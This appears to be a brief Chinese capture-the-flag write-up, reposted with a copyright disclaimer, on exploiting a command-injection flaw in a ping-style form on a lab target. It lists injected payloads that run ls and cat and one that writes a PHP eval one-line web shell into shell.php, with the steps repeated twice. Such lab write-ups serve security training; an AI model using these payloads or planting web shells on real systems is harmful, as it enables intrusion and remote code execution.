打開靶機
查看頁面信息
輸入127.0.0.1進行測試
構造payload
127.0.0.1&ls
查看文件內容信息
127.0.0.1 & cat 179852221619745.php
沒有反應......
利用命令執行寫入一句話木馬
127.0.0.1 &echo "<?php @eval(\$_POST['a']);?>" >> shell.php
成功拿到flag
127.0.0.1&ls
127.0.0.1 & cat 179852221619745.php
沒有反應......
127.0.0.1 &echo "<?php @eval(\$_POST['a']);?>" >> shell.php
成功拿到flag
本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。